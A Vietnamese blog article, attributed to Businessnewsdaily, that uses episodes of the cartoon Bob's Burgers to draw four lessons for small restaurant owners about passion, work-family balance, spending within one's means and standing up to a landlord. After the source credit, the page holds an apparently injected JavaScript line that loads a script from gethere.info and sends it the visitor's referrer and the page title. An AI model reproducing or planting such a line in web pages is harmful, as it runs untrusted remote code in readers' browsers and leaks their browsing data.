4 điều từ Bob’s Burgers dành cho những nhà hàng nhỏ

Bạn có thể tìm hiểu những gì về kinh doanh từ các chương trình truyền hình yêu thích của bạn? Rất nhiều điều, đặc biệt nếu bạn là một fan hâm mô của Bob’s Burgers, một show truyền hình phát sóng trên kênh Fox và nó vừa đi đến mùa thứ 6 vào tháng 9 vừa rồi. Đây là một chương trình lấy cảm hứng từ một blog và cuốn sách dạy nấu ăn thành công và cũng là nguồn cảm hứng kinh doanh của nhiều doanh nghiệp.

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (3)

Trước khi bạn viết tắt từ “Bob’s Burgers” như một bộ phim hoạt hình thì hãy xem xét điều này đã: như chỉ là một phim hoạt hình, xem xét điều này: Đây là một chương trình vui nhộn và khá kì quặc, nó nói về một công ty gia đình nhỏ.  Ngoài việc đề cập đến những bữa ăn của những đứa trẻ ở nhà và ở trường, nó cũng chủ yếu nói về khó khăn trong việc điều hành một doanh nghiệp nhỏ.

Dưới đây là bốn bài học quan trọng mà chủ doanh nghiệp nhỏ hiện nay hy vọng có thể học hỏi từ “Bob’s Burgers” và nếu bạn chưa xem chương trình này bao giờ thì đây chính là lúc để bạn có một cái cớ dành nhiều thời gian hơn trên Netflix, vì lợi ích cho doanh nghiệp của bạn.

#1 Bạn phải tin vào (yêu) những gì bạn đang làm

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (8)

“Bob’s Burgers” có thể được coi là một chương trình thành công nhưng nhà hàng trong chương trình này không có quá nhiều. Bob Belcher chỉ làm những đủ những gì để hỗ trợ những nhà hàng nhỏ, quán ăn hoặc cho gia đình anh. Đó có thể là câu chuyện đời thực của tác giá trong những năm tháng anh phải liên tục vật lộn với tiền bạc và hàng loạt những giấy nợ quá hạn. Tại mua đầu tiên, Bob thậm chí đã phải dành cả đêm lái xe taxi chỉ để trả tiền cho bữa tiệc sinh nhật con gái lớn của ông, Tina. Ngoài ra còn có rất nhiều phân cảnh trong chương trình mà trong đó các nhân vật khác sau khi rút ra khỏi nhà hàng vẫn nghi ngờ khả năng nấu ăn của Bob (mặc dù nhiều người trong số họ vô cùng ngạc nhiên khi nếm thử món ăn của ông ấy).

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (7)

Mặc dù có rất nhiều thất bại trong suốt mùa 1, nhưng Bob đã vượt qua tất cả với niềm đam mê công việc của mình, ông ấy muốn làm ra những chiếc Burger ngon, không bao giờ từ bỏ và đặc biệt gia đình ông lúc nào cũng ủng hộ giấc mơ đó. Vợ ông, Linda, cùng với Tina cũng như những thành viên còn lại, Gene và Louise, luôn sẵn sàng giúp đỡ ông và tạo ra một không khí vui nhộn mỗi khi ông về nhà như để tiếp thêm nguồn động lực. Bob đã từng nói ông đã hét lên vì vui sướng khi nghĩ ra một công thức nhân bánh mới và nói rõ rằng ông thực sự yêu thích công việc mình đang làm. Ông dành riêng sự thành công kinh doanh này cho vợ và những đứa con của ông và ông yêu nó như yêu họ vậy.

Điều hành một doanh nghiệp nhỏ chưa bao giờ là dễ dàng như người ta vẫn tưởng. Đó là một thách thức và đôi khi ngay cả khi bạn đã làm mọi việc, bạn vẫn có thể phải đấu tranh hoặc thậm chí thất bại hoàn toàn. Thành công sẽ đến dễ dàng hơn nếu bạn là người hiểu biết về kinh doanh hoặc về sản phẩm/dịch vụ mình cung cấp bằng sự đam mê chứ không phải vì bất cứ mục tiêu nào khác. Bạn cũng cần phải có thái độ đúng đắn và sự cống hiến trong công việc giống như gia đình nhà Belcher.

#2 Bạn phải tìm được sự cân bằng trong công việc

Điều này đặc biệt đúng với các doanh nghiệp gia đình, bởi vì bạn không thể tách rời cuộc sống gia đình với công việc bạn đã chọn. Rất nhiều chủ nhà hàng không kiểm soát tốt chuyện này dẫn đến những căng thẳng có thể đoán trước, những căng thẳng nghiêm trọng trong mối quan hệ của bạn và doanh nghiệp. Gia đình Belcher chưa bao giờ hoàn hảo khi nói đến việc phân tách công việc và cuộc sống, nhưng các thành viên trong gia đình luôn tạo ra những nỗ lực cho nhau, và đó chính là lý do tại sao sự cân bằng lại quan trọng đến như vậy.

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (6)

Bob, hơn bất cứ ai khác trong gia đình, ông có một cuộc đấu tranh âm thầm giữa một bên là gia đình, một bên là công việc nhưng ông luôn đặt cho mình nỗ lực cao nhất để thực hiện nó. Điều này có thể được chứng minh trong suốt chương trình khi anh ấy là một ông chủ và một người cha tuyệt vời. Tuy nhiên, trước đó, trong mùa 3, chính ông đã nhận ra mình đang mất đi sự cân bằng, thể hiện ở mối quan hệ căng thẳng với người cha. Trong thực tế, Bob có cảm giác ông bị cha mình cướp đi tuổi thơ và ông sợ điều đó sẽ lặp lại với những đứa con của mình, chính vì thế, ngoài những công việc mệt nhọc ở cửa hàng, hằng tuần ông vẫn dành những khoảng thời gian riêng để chơi với chúng như một “giao kèo” với những đứa trẻ để chúng không làm phiền vào những ngày ông bận rộn ở cửa hàng. Trong mùa 3, khán giả có thể chứng kiến nhiều cảnh ông vui chơi cùng những đứa con của mình trong kì nghỉ hè khi chúng còn nhỏ.

Bob, Linda và những đứa trẻ thường có những cuộc trò chuyện cá nhân và thảo luận về các vấn đề gia đình trong các nhà hàng, họ dường như có những cách xử lý khá tốt và họ biết đâu là khi vấn đề trở nên nghiêm trọng. Khi bạn làm việc với gia đình và bạn bè, bạn không thể tránh khỏi việc đan xen tình cảm cá nhân vào trong công việc nhưng bạn cần phải tìm được sự cân bằng trong những mối quan hệ này, đó chính là sự khác biệt giữa thất bại và thành công.

#3 Đừng làm gì ngoài khả năng của bạn

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (5)

Các doanh nghiệp nhỏ thường không có quyền truy cập vào những nguồn lực bên ngoài như các doanh nghiệp lớn. Khi suy nghĩ về điều này, nó thực sự khiến nhiều người bực bội: “Nếu chúng ta chỉ có số tiền này, chúng ta có thể làm điều này để thúc đẩy kinh doanh”, khi biết rằng bạn vẫn còn một chặng đường dài phía trước trước khi bạn có đủ khả năng để thực hiện.

Gia đình Belcher học được bài học này một cách khó khăn trong mùa 4, khi họ cố gắng quảng cáo để cạnh tranh với đối thủ, gia đình láng giềng của họ, Jimmy Pesto (mối thù truyền kiếp của Bob) bằng cách mua một quầy bán hàng trong Super Bowl. Chi phí quảng cáo đã lên đến $3,000. Chiếm phần lớn trong chiến dịch quảng cáo của Bob’s Burgers là khi Gene mặc một bộ đồng phục Burgers và đứng bên ngoài cùng một chiếc loa lớn. Nó không chỉ làm cho Belchers chẳng thu được một kết quả nào mà Jimmy Pesto dường như cũng không hề bị ảnh hưởng. Cuối cùng, chiến dịch quảng cáo tại Super Bowl không mang lại thêm cho họ khách hàng mà chỉ khiến họ mất thời gian và một khoản tiền lớn.

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (4)

Đừng cố gắng vượt qua đối thủ cạnh tranh của bạn bằng những hoạt động ngoài khả năng của chính bạn. Đó là một rủi ro tài chính khổng lồ nếu như bạn không cẩn thận.

#4 Bạn phải sẵn sàng chiến đấu cho sự thành công

Là chủ doanh nghiệp, Bob không ngừng chiến đấu để giữ cho doanh nghiệp của mình tồn tại, đặc biệt là khi nói đến giao dịch với chủ nhà của ông, Fischoeder. Những người giàu có thường nắm giữ mọi thứ trong thành phố, Fischoeder không phải là chủ nhà tốt nhất hay hiểu biết nhất. Ông thường xuyên đe dọa gia đình Belchers về việc gia hạn hợp đồng thuê nhà để giành thế trên trong mọi chuyện.

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (2)

Tuy nhiên, Bob chưa bao giờ chấp nhận mọi chuyện quá dễ dàng. Ông thường là người đầu tiên thách thức những hành động của Fischoeder. Trong mùa 5, Bob và gia đình của ông đã dẫn tất cả những người thuê nhà đến để phản đối việc tăng tiền thuê nhà, dẫn đến một “Hunger Games” trong rừng liên quan đến những trái bóng nước (Thực sự điều này không bao giờ xảy ra ở ngoài đời thực nhưng nội dung bộ phim hoạt hình muốn nói đến là sự phản công để giảnh lấy quyền lợi gì đó của những gia đình thuê nhà ở đây). Fischoeder đã cố gắng mua chuộc những người thuê nhà khác để quay lại chống đối Bob (với điều kiện sẽ giảm tiền thuê nhà của họ xuống để tăng tiền thuê nhà của Bob lên). Nhưng cuối cùng, gia đình Belchers đã nhắc nhở mọi người tầm quan trọng của sự liên kết, buộc Fischoeder đồng ý không tăng tiền thuê của họ trong một thời gian dài.

4-dieu-tư-Bob-Burgers-danh-cho-nha-hang-nho (1)

Bạn không phải là một người lập dị hay một người quá hung hăng nhưng bạn cần biết đấu tranh vì những quyền lợi cho doanh nghiệp của mình. Fischoeder chính là một nhân vật đại diện cho những nghịch cảnh mà nhiều chủ nhà hàng phải đối mặt, đặc biệt là những nhà hàng nhỏ liên quan đến vấn đề chi phí thuê mặt bằng. Nếu bạn muốn kinh doanh thành công, bạn cần phải thách thức.

(Nguồn: Businessnewsdaily)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Thảo luận

Bình luận